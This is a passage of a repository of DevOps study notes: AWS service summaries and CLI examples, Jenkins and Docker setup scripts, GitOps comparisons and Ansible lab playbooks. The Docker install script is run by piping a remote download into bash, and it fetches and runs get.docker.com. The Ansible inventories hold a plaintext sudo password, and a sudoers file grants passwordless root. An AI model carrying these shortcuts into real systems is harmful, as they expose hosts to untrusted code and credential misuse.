ec2-1 <-.-> rds 62 | ec2-2 <-.-> rds 63 | ec2-3 <-.-> rds 64 | ``` 65 | 66 | **Problem:** 67 | If we want to focus on the code rather than on managing the infrastructure, we can use [Beanstalk](./beanstalk.md). 68 | 69 | | Feature | Elastic [Beanstalk](./beanstalk.md) | [EC2](./ec2.md) (Manual Deployment) | AWS [Lambda](./lambda.md) | 70 | | -----| ------------------- | -------------------------| --------------| 71 | | Use Case | Web applications with managed infra | Full control over servers | Serverless apps with event-driven execution 72 | | Infrastructure Management | Fully managed | Manual | Fully managed 73 | | Auto Scaling | Built-in | Requires configuration | Automatic 74 | | Customization | Moderate | High | Limited 75 | | Supported Languages | Python, Java, Node.js, .NET, PHP, Ruby, Go | Any | Any 76 | | Pricing Model | Pay for underlying AWS resources | Pay for EC2 resources | Pay per execution -------------------------------------------------------------------------------- /AWS/services/eks.md: -------------------------------------------------------------------------------- 1 | # Elastic Kubernetes Service (EKS) 2 | A fully managed service that simplifies the deployment, management, and scaling of Kubernetes clusters on AWS. It abstracts the complexity of managing Kubernetes infrastructure while providing powerful tools for building containerized applications. 3 | 4 | --- 5 | 6 | **EKS** can run containers on both compute options that [ECS](./ecs.md) supports, i.e. **EC2** and **Fargate**. 
7 | 8 | 9 | > [!IMPORTANT] 10 | > Kubernetes is cloud-agnostic 11 | 12 | --- 13 | 14 | ## CLI 15 | 16 | List Clusters 17 | `aws eks list-clusters` 18 | 19 | Create a Cluster 20 | `aws eks create-cluster --name my-cluster --role-arn my-role --resources-vpc-config subnetIds=subnet-12345,subnet-67890` 21 | 22 | Delete a Cluster 23 | `aws eks delete-cluster --name my-cluster` -------------------------------------------------------------------------------- /AWS/services/elasticache.md: -------------------------------------------------------------------------------- 1 | # ElastiCache 2 | ElastiCache is a fully managed, **in-memory** **data store** and **caching** service provided by AWS. It is designed to improve the performance of applications by enabling low-latency access to frequently accessed data. ElastiCache supports two popular open-source engines: **Redis** and **Memcached**. 3 | 4 | Concept: 5 | ```mermaid 6 | graph LR 7 | 8 | web 9 | elb(("ELB")) 10 | ec2["EC2"] 11 | elasticache[("ElastiCache")] 12 | rds@{ shape: lin-cyl, label: "RDS"} 13 | 14 | style web opacity:0 15 | 16 | 17 | web -.-> elb 18 | elb -->ec2 19 | 20 | ec2 <--> |Read/Write from cache 21 | fast| elasticache 22 | ec2 <--> |Read/Write from DB 23 | slow| rds 24 | ``` -------------------------------------------------------------------------------- /AWS/services/lambda-vs-batch.md: -------------------------------------------------------------------------------- 1 | # [Lambda](./lambda.md) vs [Batch](./batch.md) 2 | 3 | | Feature | Batch | AWS Lambda 4 | | --------| -------| ----------- 5 | | Execution Model | Executes batch jobs with defined start and end points. | Executes code in response to events (serverless). 6 | | Use Case | Ideal for running large-scale, long-running batch jobs that process data in chunks. | Best for short-lived tasks or microservices that run on-demand in response to events. 7 | | Job Duration | Can handle long-running jobs, from minutes to hours or more. 
| Limited to 15 minutes per invocation. 8 | | Scaling | Automatically scales compute resources based on job demand. | Automatically scales based on the number of events. 9 | | Resource Management | Requires setting up and managing compute environments (e.g., EC2 instances). | Fully managed, with no need to handle the underlying infrastructure. 10 | | Compute Resources | Uses EC2 instances or Fargate for job execution. | Runs in a fully managed, serverless environment with no need to provision resources. 11 | | Cost Structure | Pay for EC2 instance usage, including spot instances, and job execution duration. | Pay per request and per compute time (duration). 12 | | Event-Driven | Not event-driven; batch jobs are typically scheduled or triggered manually. | Event-driven, triggered by events like HTTP requests, file uploads, or CloudWatch events. 13 | | Complexity | Suited for complex workflows with dependencies, multi-step processes, and large data processing. | Ideal for simple, stateless functions with minimal dependencies. 14 | | State Management | Can manage state over longer job executions using custom setups. | Stateless functions by design; state management must be external (e.g., DynamoDB, S3). 15 | | Languages | Supports multiple languages via custom environments (Python, Java, etc.). | Supports multiple languages out-of-the-box (Node.js, Python, Java, Go, etc.). 16 | | Container Support | Can run jobs inside Docker containers, providing flexibility and consistency. | Supports running functions in containers (via Lambda container images). -------------------------------------------------------------------------------- /AWS/services/lambda.md: -------------------------------------------------------------------------------- 1 | # Lambda 2 | 3 | AWS Lambda is a [serverless](../onboarding/serverless.md) compute service provided by Amazon Web Services (AWS) that lets you run code without provisioning or managing servers. 
It automatically scales your application by running code in response to events such as changes in data, system state, or user actions. 4 | 5 | | Feature | Description | 6 | | ----| ----| 7 | | Serverless | **No servers to manage**, automatically scales to accommodate workload. 8 | | Event-Driven | Lambda functions are **triggered by events** (e.g., HTTP requests, changes in data, etc.). 9 | | Time Limitations | Functions have a maximum execution time (15 minutes). 10 | | On-Demand Execution | Functions run **only when triggered**, ensuring efficiency and cost savings. 11 | | Auto-Scaling | Lambda **automatically handles scaling** based on incoming requests. 12 | | Multi-Language Support | Supports **several programming languages** (Node.js, Python, Java, C#, Go, etc.). 13 | | Cost-Effective | **Pay-per-use** model: charged **per request** (\$0.20 per 1 million requests) and **duration** (roughly \$1.00 per 60,000 GB-seconds). 14 | | Cost Efficiency | **Very affordable**, making it highly popular for small and large-scale applications. 15 | | Event Scheduling | Can be triggered by scheduled events like **CRON jobs** (using **CloudWatch Events** or **EventBridge**). 16 | | Container Support | Lambda **supports container images** that implement the **Lambda runtime API** for custom environments. 17 | | ECS/Fargate Preference | For **larger or more complex** containerized applications, AWS **ECS/Fargate** is often preferred over **Lambda container images**. 18 | 19 | > [!NOTE] 20 | > Read [API Gateway](./api-gateway.md) to create serverless apps. 21 | 22 | > [!IMPORTANT] 23 | > A comparison between Lambda and Batch is available [here](./lambda-vs-batch.md).
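The event-driven model above can be sketched with a minimal handler. This is an illustrative example, not from the source notes: the event field (`name`) and the API-Gateway-style response shape are assumptions.

```python
import json

def lambda_handler(event, context):
    # Lambda invokes this entry point with the triggering event (a dict)
    # and a context object; here we read an assumed "name" field.
    name = event.get("name", "world")
    # An API-Gateway-style response: status code plus a JSON-encoded body.
    return {
        "statusCode": 200,
        "body": json.dumps({"message": f"Hello, {name}!"}),
    }
```

Locally you can simulate an invocation with `lambda_handler({"name": "Ada"}, None)`; in AWS the event payload comes from the triggering service (API Gateway, S3, EventBridge, etc.).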
24 | 25 | --- 26 | 27 | ## CLI 28 | 29 | List Functions 30 | `aws lambda list-functions` 31 | 32 | Invoke a Function 33 | `aws lambda invoke --function-name my-function response.json` 34 | 35 | Update Function Code 36 | `aws lambda update-function-code --function-name my-function --zip-file fileb://function.zip` -------------------------------------------------------------------------------- /AWS/services/lightsail.md: -------------------------------------------------------------------------------- 1 | # Lightsail 2 | Amazon Lightsail is a simplified cloud computing service offered by AWS that provides an easy-to-use interface for deploying and managing virtual private servers (VPS). 3 | 4 | > [!IMPORTANT] 5 | > Lightsail offers an easy-to-use management console with **simple configuration options**, reducing the complexity of setting up and managing cloud resources ([EC2](./ec2.md), [S3](./s3.md), [ELB](./elb.md), [EBS](./ebs.md), [RDS](./rds.md), etc). 6 | 7 | | Feature | Description| 8 | | --------| -----------| 9 | | Fixed Pricing | Lightsail instances come with a predictable, transparent pricing model. 10 | | Simplified Management | It abstracts many of the underlying AWS services, making it more approachable for developers or small businesses with less experience in cloud infrastructure. 11 | 12 | > [!IMPORTANT] 13 | > There is **no auto-scaling** option, integrations with other AWS services are limited, and **high availability** is **not** provided. 14 | 15 | **Use Cases:** 16 | - Easily deploy and host websites, blogs, and web applications. 17 | - Ideal for those who need affordable and easy-to-manage cloud infrastructure. 18 | - Set up development environments quickly for small-scale applications or projects.
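
---

## CLI

> [!NOTE]
> The commands below are a sketch following the CLI sections of the other service notes; the instance name, zone, blueprint ID, and bundle ID are illustrative (list the real ones with `aws lightsail get-blueprints` and `aws lightsail get-bundles`).

List Instances
`aws lightsail get-instances`

Create an Instance
`aws lightsail create-instances --instance-names my-instance --availability-zone us-east-1a --blueprint-id ubuntu_22_04 --bundle-id nano_2_0`

Delete an Instance
`aws lightsail delete-instance --instance-name my-instance`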
-------------------------------------------------------------------------------- /AWS/services/sns.md: -------------------------------------------------------------------------------- 1 | # Simple Notification Service (SNS) 2 | 3 | Amazon Simple Notification Service (SNS) is a fully managed messaging and notification service that allows you to send messages or notifications to a large number of subscribers or endpoints. 4 | -------------------------------------------------------------------------------- /AWS/services/vpc.md: -------------------------------------------------------------------------------- 1 | # Virtual Private Cloud (VPC) 2 | 3 | --- 4 | 5 | ## CLI 6 | 7 | List VPCs 8 | `aws ec2 describe-vpcs` 9 | 10 | Create a VPC 11 | `aws ec2 create-vpc --cidr-block 10.0.0.0/16` 12 | 13 | Delete a VPC 14 | `aws ec2 delete-vpc --vpc-id vpc-12345678` 15 | 16 | -------------------------------------------------------------------------------- /Applications/Wakapi/README.md: -------------------------------------------------------------------------------- 1 | # Wakapi 2 | [Wakapi](https://wakapi.dev/) is an open-source tool designed to track the time you spend coding on various projects in multiple programming languages and beyond. 3 | 4 | Wakapi is an open-source alternative to [wakatime](https://wakatime.com/) that can run on-premises as a self-hosted solution. 5 | 6 | ## Usage 7 | 8 | 1. Run Wakapi on one of your devices, e.g. using [Docker](https://github.com/CSpyridakis/dockerfiles/blob/main/wakapi/docker-compose.yml). 9 | 2. Open VSCode and install the Wakatime extension. 10 | We are going to use the Wakatime extension; however, we'll point it at our own Wakapi server instead of the official Wakatime service. 11 | 3. 
Update the `Wakatime` configuration file `~/.wakatime.cfg` like this: 12 | ``` 13 | [settings] 14 | api_url = https:///api 15 | api_key = 16 | 17 | status_bar_enabled = true 18 | disabled = false 19 | status_bar_coding_activity = true 20 | debug = false 21 | ``` -------------------------------------------------------------------------------- /CI-CD/Jenkins/Jenkinsfile: -------------------------------------------------------------------------------- 1 | pipeline { 2 | /************ AGENT CONFIGURATION ************/ 3 | // Use 'any' to allow execution on any available Jenkins node, 4 | // or pin the pipeline to labelled nodes with: 5 | // agent { label 'docker-agent' } 6 | agent any 7 | 8 | 9 | 10 | /************ TOOLS CONFIGURATION ************/ 11 | // Declare required tool installations here if needed, e.g. tools { maven 'M3' } 12 | // (an empty tools {} block is invalid in declarative pipelines, 13 | // so this section is left commented out) 14 | 15 | 16 | /************ ENVIRONMENT VARIABLES ************/ 17 | // Define environment variables here if needed, 18 | // e.g. environment { APP_ENV = 'ci' } 19 | 20 | 21 | 22 | /************ STAGES ************/ 23 | stages { 24 | // 1. Fetch source code 25 | stage('Checkout') { 26 | steps { 27 | git branch: 'main', url: 'https://github.com/your-repo.git' 28 | } 29 | } 30 | 31 | // 2. Build process (replace with actual build command) 32 | stage('Build') { 33 | steps { 34 | sh './build.sh' // Replace with the appropriate build command 35 | } 36 | post { 37 | success { 38 | echo "[Build] Success" 39 | archiveArtifacts artifacts: '**/*.' 40 | } 41 | } 42 | } 43 | 44 | // 3. Run tests (unit tests, integration tests, etc.) 45 | stage('Test') { 46 | steps { 47 | sh './run-tests.sh' // Adjust based on the project 48 | } 49 | post { 50 | success { 51 | echo "[Tests] Success" 52 | } 53 | failure { 54 | echo "[Tests] Failure" 55 | } 56 | } 57 | } 58 | } 59 | 60 | 61 | /************ POST ACTIONS ************/ 62 | post { 63 | always { 64 | echo 'Pipeline execution completed.' 65 | } 66 | success { 67 | echo 'Pipeline succeeded!' 68 | } 69 | failure { 70 | echo 'Pipeline failed!'
71 | } 72 | } 73 | } -------------------------------------------------------------------------------- /CI-CD/Jenkins/installation.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # see https://www.jenkins.io/doc/book/installing/linux/#debianubuntu 3 | 4 | sudo wget -O /usr/share/keyrings/jenkins-keyring.asc \ 5 | https://pkg.jenkins.io/debian-stable/jenkins.io-2023.key 6 | 7 | echo "deb [signed-by=/usr/share/keyrings/jenkins-keyring.asc]" \ 8 | https://pkg.jenkins.io/debian-stable binary/ | sudo tee \ 9 | /etc/apt/sources.list.d/jenkins.list > /dev/null 10 | 11 | sudo apt-get update 12 | sudo apt-get install jenkins -------------------------------------------------------------------------------- /DevOps/NexusOSS.md: -------------------------------------------------------------------------------- 1 | # Nexus OSS (Sonatype Nexus Repository) 2 | 3 | Nexus OSS is a repository manager that stores and manages software artifacts, including dependencies and Docker images. It simplifies versioning, access control, and deployment, acting as a centralized storage for binaries in a development workflow. 4 | 5 | Key features include: 6 | - Artifact management: Stores build artifacts, libraries, and dependencies. 7 | - Docker registry support: Can act as a local repository for Docker images. 8 | - Integration with Maven, Gradle, and other build tools. 9 | - Security policies for access control and governance. -------------------------------------------------------------------------------- /DevOps/SonarQube.md: -------------------------------------------------------------------------------- 1 | # SonarQube 2 | SonarQube is an **open-source** platform for **continuous inspection** of code quality. It helps detect **code smells, bugs, security vulnerabilities, and technical debt** in applications. 
It supports several programming languages and integrates with **CI/CD** pipelines, making it an essential tool for improving code quality over time. 3 | 4 | It provides features like: 5 | - **Static code analysis** 6 | - **Code coverage** and duplication checks 7 | - **Security vulnerability** detection 8 | - Integration with Git, **Jenkins**, and other tools 9 | 10 | ## Why code analysis 11 | - Follow Best Practices 12 | - Detect vulnerabilities -------------------------------------------------------------------------------- /DevOps/tools/BUILD: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # TODO: After any major update, modify the version number 4 | VERSION="1.7" 5 | 6 | docker build \ 7 | -t cspyridakis/devopstools:latest \ 8 | --build-arg BUILDDATE=$(date +'%Y-%m-%d') \ 9 | --build-arg VERSION=${VERSION} \ 10 | -f devops-tools.Dockerfile . 11 | 12 | docker tag cspyridakis/devopstools:latest cspyridakis/devopstools:${VERSION} 13 | 14 | echo "[Complete]" 15 | echo 16 | echo "A. Run now from the directory of your choice:" 17 | echo "$ docker run -it --rm -v \$(pwd):/app cspyridakis/devopstools:latest" 18 | echo 19 | echo "B. Or if you prefer, you can append this, at the bottom of your .bashrc/.zshrc:" 20 | echo "function devopstools(){" 21 | echo " docker run -it --rm \ " 22 | echo " -v \"\$PWD\":/home/apps/ \ " 23 | echo " -v \"\$HOME/.aws\":/home/devops/.aws:ro \ " 24 | echo " -v \"\$HOME/.ssh\":/home/devops/.ssh:ro \ " 25 | echo " -v /var/run/docker.sock:/var/run/docker.sock \ " 26 | echo " cspyridakis/devopstools:latest" 27 | echo "}" 28 | -------------------------------------------------------------------------------- /Docker/commands.md: -------------------------------------------------------------------------------- 1 | # Docker commands 2 | 3 | ## General 4 | - docker info 5 | - docker ps 6 | 7 | ## Images 8 | - docker build -t {tag-name} -f {Dockerfile} . 
9 | - docker inspect {image} 10 | 11 | ## Containers 12 | - docker run -it --rm --name {container-name} {image-name} 13 | - docker top {container} 14 | 15 | ## Docker Compose 16 | - docker compose up/down 17 | - docker compose logs # Display logs 18 | - docker compose ps 19 | - docker compose top 20 | 21 | ## Docker Swarm 22 | - `docker swarm` Handle swarm, initialize it, destroy it, etc 23 | - `docker node` Display nodes, promote nodes or handle nodes in general 24 | - `docker service` Manage swarm services 25 | - `docker stack` Deploy and manage stacks of services 26 | - `docker secret` Manage swarm secrets -------------------------------------------------------------------------------- /Docker/docker-compose-template.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' # Specify the Docker Compose file version 2 | 3 | services: 4 | service1: # Define the first service 5 | image: {image}:{tag} # Specify the image to use for this service 6 | ports: 7 | - "{host-port}:{container-port}" # Map ports from the host to the container 8 | volumes: 9 | - {host-path}:{container-path} # Mount volumes from the host to the container 10 | environment: 11 | ENV_VAR_NAME: {value} # Set environment variables 12 | depends_on: 13 | - service2 # Define dependencies on other services 14 | networks: 15 | - network1 # Specify networks to join 16 | 17 | service2: # Define the second service 18 | build: # Use this to build an image from a Dockerfile 19 | context: {build-context} 20 | dockerfile: {dockerfile} 21 | image: {image-name} # The name to give the built image 22 | command: {command} # Override the default command 23 | 24 | networks: # Define networks 25 | network1: 26 | driver: {driver} # Specify network driver (e.g. bridge, overlay) 27 | 28 | volumes: # Define volumes 29 | volume1: 30 | external: true # Specify if the volume is external 31 | 32 | configs: # Define configuration files 33 | config1: 34 | file: {path-to-config-file} # Specify the path to the config file 35 | 36 | secrets: # Define secrets for services 37 | secret1: 38 | file: {path-to-secret-file} # Specify the path to the secret file --------------------------------------------------------------------------------
/Docker/install-docker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Run it like this: 4 | # bash <(curl -sL https://raw.githubusercontent.com/CSpyridakis/notes/refs/heads/main/Docker/install-docker.sh) 5 | 6 | # Install docker 7 | curl -fsSL get.docker.com -o get-docker.sh && sh get-docker.sh && rm get-docker.sh 8 | 9 | # ------------------------------------------------ 10 | # POST INSTALLATION ACTIONS (see: https://docs.docker.com/engine/install/linux-postinstall/) 11 | 12 | # Create the docker group if not exist 13 | sudo groupadd docker 14 | 15 | # Add your user to the docker group. 16 | sudo usermod -aG docker $USER 17 | 18 | # Activate the changes to groups 19 | newgrp docker 20 | 21 | # Verify that you can run docker commands without sudo 22 | docker run hello-world -------------------------------------------------------------------------------- /GIT/concepts.md: -------------------------------------------------------------------------------- 1 | 2 | ## Localized 3 | ```mermaid 4 | %%{init: {'theme':'neutral'}}%% 5 | graph TB 6 | 7 | subgraph local["Local machine"] 8 | direction LR 9 | subgraph vsc["Version Control System"] 10 | direction LR 11 | ver1["Version 1.1"] 12 | ver2["Version 1.2"] 13 | ver3["Version 1.3"] 14 | end 15 | 16 | File --- vsc 17 | end 18 | ``` 19 | 20 | ## Centralized 21 | ```mermaid 22 | %%{init: {'theme':'neutral'}}%% 23 | graph LR 24 | 25 | subgraph local[" "] 26 | direction LR 27 | local-copy1["Client"] 28 | local-copy2["Client"] 29 | local-copy3["Client"] 30 | end 31 | cental-repo[("Central Repository")] 32 | 33 | local-copy1 <--> | Update | cental-repo 34 | local-copy2 <--> | Update | cental-repo 35 | local-copy3 <--> | Update | cental-repo 36 | ``` 37 | 38 | ## Distributed 39 | ```mermaid 40 | %%{init: {'theme':'neutral'}}%% 41 | graph LR 42 | 43 | subgraph locals[" "] 44 | direction TB 45 | subgraph local1[" "] 46 | direction TB 47 | local-copy1["Client"] 48 | 
local-repo1[("Repo")] 49 | local-repo1 <--> local-copy1 50 | end 51 | subgraph local2[" "] 52 | direction TB 53 | local-copy2["Client"] 54 | local-repo2[("Repo")] 55 | local-repo2 <--> local-copy2 56 | end 57 | subgraph local3[" "] 58 | direction TB 59 | local-copy3["Client"] 60 | local-repo3[("Repo")] 61 | local-repo3 <--> local-copy3 62 | end 63 | end 64 | 65 | cental-repo[("Central Repository")] 66 | local-copy1 <--> | Update | cental-repo 67 | local-copy2 <--> | Update | cental-repo 68 | local-copy3 <--> | Update | cental-repo 69 | ``` 70 | -------------------------------------------------------------------------------- /GitOps/README.md: -------------------------------------------------------------------------------- 1 | # GitOps 2 | 3 | ## FluxCD vs ArgoCD 4 | ### **Overview** 5 | 6 | | Feature | **FluxCD** | **ArgoCD** | 7 | |----------------------|----------------------------------------|-------------------------------------| 8 | | **Primary Use Case** | Continuous deployment for Kubernetes. | Application-focused GitOps for Kubernetes. | 9 | | **Architecture** | Agent-based, Git-pull model. | Web-based UI and API, Git-pull model. | 10 | | **GitOps Model** | Pushes changes automatically to Kubernetes clusters. | Monitors Git and syncs changes upon request or automatically. | 11 | | **Popularity** | Ideal for CI/CD pipelines and cluster-wide automation. | Widely used for application lifecycle management. | 12 | 13 | --- 14 | 15 | ### **Key Differences** 16 | 17 | | Aspect | **FluxCD** | **ArgoCD** | 18 | |----------------------------|------------------------------------------------|-----------------------------------------------| 19 | | **Installation** | Lightweight; fewer dependencies. | Slightly heavier; includes a UI and API server. | 20 | | **Declarative Support** | Full support for Kubernetes manifests and Helm charts. | Similar support but focused on application-level resources. | 21 | | **User Interface** | CLI-driven and YAML-based configuration. 
| Rich Web UI for visualization and management. | 22 | | **Multi-Cluster Support** | Supports multi-cluster, but requires Flux instances in each cluster. | Native multi-cluster management. | 23 | | **Sync Mechanism** | Automatically applies changes from Git. | Can be automated or manual with sync buttons in the UI. | 24 | | **Drift Detection** | Detects drift but does not notify; reconciles automatically. | Detects drift and can notify users via UI or webhook. | 25 | | **Custom Resources** | Focused on Kubernetes native resources. | Supports additional resource types like CRDs. | 26 | | **Scalability** | Excellent for managing infrastructure at scale. | Better for managing applications in complex environments. | 27 | | **Notifications** | Requires additional setup (e.g., webhooks). | Built-in notification support for drift and sync events. | 28 | 29 | --- 30 | -------------------------------------------------------------------------------- /Hugo/notes.md: -------------------------------------------------------------------------------- 1 | archetypes: 2 | Default data for new content 3 | 4 | assets: 5 | resources (css/js) 6 | 7 | content: 8 | Markdown content files 9 | 10 | data: 11 | json or xml data 12 | 13 | i18n: 14 | Translation tables for other languages 15 | 16 | layouts: 17 | Custom themes 18 | 19 | public: 20 | Generated site 21 | 22 | resources: 23 | Cached assets generated by Hugo (e.g. processed images) 24 | 25 | static: 26 | Files copied verbatim to the published site 27 | 28 | Frontmatter: post metadata 29 | 30 | include sitemap.xml in footer 31 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/1.hello-world/RUNME: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible all -m ping -------------------------------------------------------------------------------- /IaC/Ansible/examples/1.hello-world/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./servers 3 | # TODO: You need to have this file 4 |
private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/1.hello-world/servers: -------------------------------------------------------------------------------- 1 | [servers] 2 | 3 | # Server 1 IP 4 | 192.168.10.89 ansible_user=ubuntu 5 | 6 | # Server 2 IP 7 | 192.168.10.98 ansible_user=vm 8 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/10.tags/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/10.tags/dummy-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # Ping Ubuntu 3 | - hosts: all 4 | pre_tasks: 5 | - name: UBUNTU ping servers 6 | when: ansible_distribution in ["Ubuntu", "Debian"] 7 | tags: ubuntu,ping 8 | ansible.builtin.ping: 9 | 10 | # Ping Fedora 11 | - hosts: all 12 | pre_tasks: 13 | - name: FEDORA ping servers 14 | when: ansible_distribution == "Fedora" 15 | tags: fedora,ping 16 | ansible.builtin.ping: 17 | 18 | # Uptime Ubuntu 19 | - hosts: all 20 | tasks: 21 | - name: UBUNTU Show uptime 22 | when: ansible_distribution in ["Ubuntu", "Debian"] 23 | tags: ubuntu,uptime 24 | ansible.builtin.shell: uptime 25 | register: uptime_output 26 | 27 | - name: UBUNTU Print uptime result 28 | when: ansible_distribution in ["Ubuntu", "Debian"] 29 | tags: ubuntu,uptime 30 | ansible.builtin.debug: 31 | msg: "{{ uptime_output.stdout }}" 32 | 33 | # Uptime Fedora 34 | - hosts: all 35 | tasks: 36 | - name: FEDORA Show uptime 37 | when: ansible_distribution == "Fedora" 38 | tags: fedora,uptime 39 | ansible.builtin.shell: uptime 40 | register: 
uptime_output 41 | 42 | - name: FEDORA Print uptime result 43 | when: ansible_distribution == "Fedora" 44 | tags: fedora,uptime 45 | ansible.builtin.debug: 46 | msg: "{{ uptime_output.stdout }}" 47 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/10.tags/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 192.168.10.78 6 | 192.168.10.79 7 | 192.168.10.77 8 | 9 | # =================================================================== 10 | 11 | # Vars for all machines in this group 12 | [servers:vars] 13 | 14 | # Remote user 15 | ansible_user=vm 16 | 17 | # Password for sudo privileges (see also become: true in the playbook) 18 | # This is NOT recommended 19 | ansible_become_pass=vm 20 | 21 | # =================================================================== 22 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/10.tags/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This command should only run ping and fedora related tags 4 | ansible-playbook --tags "ping,fedora" dummy-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/copy-and-extract-zip-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | become: true 4 | tasks:
5 | 6 | # Task 1 7 | - name: Copy file to servers 8 | copy: 9 | # Even though this file is located in the files/ dir only the filename is used 10 | # this is because the files/ dir is assumed 11 | src: dummy_folder.zip 12 | dest: /home/vm/dummy_folder.zip 13 | owner: vm 14 | group: vm 15 | mode: 0644 16 | 17 | # Task 2 18 | - name: Install zip 19 | package: 20 | update_cache: yes # Combine cache update with the installation 21 | name: 22 | - zip 23 | state: latest 24 | 25 | # Task 3 26 | - name: Unzip dir 27 | unarchive: 28 | src: /home/vm/dummy_folder.zip 29 | dest: /home/vm/ 30 | remote_src: true # <-- This tells Ansible the file is already on the remote 31 | # If we do not include it, we can also use a URL directly 32 | owner: vm 33 | group: vm 34 | mode: 0755 35 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/copy-file-playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - hosts: all 3 | tasks: 4 | - name: Copy file to servers 5 | copy: 6 | # Even though this file is located in the files/ dir only the filename is used 7 | # this is because the files/ dir is assumed 8 | src: dummy_file.txt 9 | dest: /home/vm/dummy_file.txt 10 | owner: vm 11 | group: vm 12 | mode: 0644 13 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/files/dummy_file.txt: -------------------------------------------------------------------------------- 1 | This is a dummy file that will be copied on each host 2 | 3 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/files/dummy_folder.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CSpyridakis/notes/a51682b5510bc694537a0e1f12914f36d2a3a2a2/IaC/Ansible/examples/11.files/files/dummy_folder.zip 
-------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 192.168.10.78 6 | 192.168.10.79 7 | 192.168.10.77 8 | 9 | # =================================================================== 10 | 11 | # Vars for all machines in this group 12 | [servers:vars] 13 | 14 | # Remote user 15 | ansible_user=vm 16 | 17 | # Password for sudo privileges (see also become: true in the playbook) 18 | # This is NOT recommended 19 | ansible_become_pass=vm 20 | 21 | # =================================================================== 22 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/11.files/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook copy-file-playbook.yml 4 | 5 | echo ================================================================ 6 | 7 | ansible-playbook copy-and-extract-zip-playbook.yml -------------------------------------------------------------------------------- /IaC/Ansible/examples/12.services/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/12.services/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 192.168.10.78 6 | 192.168.10.79 7 | 192.168.10.77 8 | 9 | # 
=================================================================== 10 | 11 | # Vars for all machines in this group 12 | [servers:vars] 13 | 14 | # Remote user 15 | ansible_user=vm 16 | 17 | # Password for sudo privileges (see also become: true in the playbook) 18 | # This is NOT recommended 19 | ansible_become_pass=vm 20 | 21 | # =================================================================== 22 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/12.services/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | # Installation 3 | - hosts: all 4 | become: true 5 | pre_tasks: 6 | - name: Install apache2 (Ubuntu) 7 | when: ansible_distribution == "Ubuntu" 8 | apt: 9 | update_cache: true 10 | name: 11 | - apache2 12 | state: latest 13 | 14 | - name: Install httpd (Fedora) 15 | when: ansible_distribution == "Fedora" 16 | dnf: 17 | update_cache: true 18 | name: 19 | - httpd 20 | state: latest 21 | 22 | # Actual service handling 23 | - hosts: all 24 | become: true 25 | tasks: 26 | - name: Start apache2 service (Ubuntu) 27 | when: ansible_distribution == "Ubuntu" 28 | service: 29 | name: apache2 30 | state: started 31 | 32 | - name: Start httpd service (Fedora) 33 | when: ansible_distribution == "Fedora" 34 | service: 35 | name: httpd 36 | state: started 37 | enabled: yes -------------------------------------------------------------------------------- /IaC/Ansible/examples/12.services/run-playbook.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ansible-playbook playbook.yml 4 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/13.users/ansible.cfg: -------------------------------------------------------------------------------- 1 | [defaults] 2 | inventory = ./hosts 3 | # TODO: You need to have this file 4 | private_key_file = ~/.ssh/ansible 5 | 
interpreter_python=auto_silent -------------------------------------------------------------------------------- /IaC/Ansible/examples/13.users/files/sudoer_superuser: -------------------------------------------------------------------------------- 1 | superuser ALL=(ALL) NOPASSWD: ALL 2 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/13.users/hosts: -------------------------------------------------------------------------------- 1 | # =================================================================== 2 | 3 | # Group of servers, can have any name 4 | [servers] 5 | 192.168.10.78 6 | 192.168.10.79 7 | 192.168.10.77 8 | 9 | # =================================================================== 10 | 11 | # Vars for all machines in this group 12 | [servers:vars] 13 | 14 | # Remote user 15 | ansible_user=vm 16 | 17 | # Password for sudo privileges (see also become: true in the playbook) 18 | # This is NOT recommended 19 | ansible_become_pass=vm 20 | 21 | # =================================================================== 22 | -------------------------------------------------------------------------------- /IaC/Ansible/examples/13.users/playbook.yml: -------------------------------------------------------------------------------- 1 | --- 2 | - 